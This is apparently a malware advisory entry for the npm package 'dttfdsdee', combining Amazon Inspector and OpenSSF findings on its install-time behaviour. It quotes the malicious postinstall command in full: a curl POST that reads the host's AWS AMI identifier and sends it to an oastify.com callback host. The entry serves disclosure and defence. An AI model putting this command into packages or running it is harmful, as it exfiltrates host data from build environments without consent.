—

MAL-2026-6498

Malicious code in dttfdsdee (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7f61e9b10455dc3781fcee5dfb2654ff824c2ac2e51dfaf7ebfba342f570f66c) package.json declares a postinstall lifecycle script that runs on every npm install: `curl -X POST -d "$(cat /data/ami-id)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. This reads the AWS EC2 AMI identifier from the installer's host and POSTs it over plain HTTP to an attacker-controlled oastify.com subdomain (Burp Collaborator out-of-band callback host). Auto-executes without user consent and is unrelated to any documented package purpose; the internal name claims to be `easy-string-kit`, while author, repository, and homepage metadata fields are empty and a keyword contains an embedded shell fragment (`trunls -lae`). The shape — throwaway name, missing maintainer metadata, OAST exfil of a host identifier on install — is consistent with reconnaissance / dependency-confusion probing of internal build environments.

## Source: ossf-package-analysis (bb785783c80ff1b3c13e9d6dc3b3c583d2eeb58f9f7f102d219a7448a71560b5) The OpenSSF Package Analysis project identified 'dttfdsdee' @ 1.0.1 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / dttfdsdee

No fixed version published yet for dttfdsdee (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/dttfdsdee/v/1.0.3 [PACKAGE]
https://www.npmjs.com/package/dttfdsdee/v/1.0.4 [PACKAGE]
https://www.npmjs.com/package/dttfdsdee/v/1.0.1 [PACKAGE]
https://www.npmjs.com/package/dttfdsdee/v/1.0.0 [PACKAGE]
https://www.npmjs.com/package/dttfdsdee/v/1.0.2 [PACKAGE]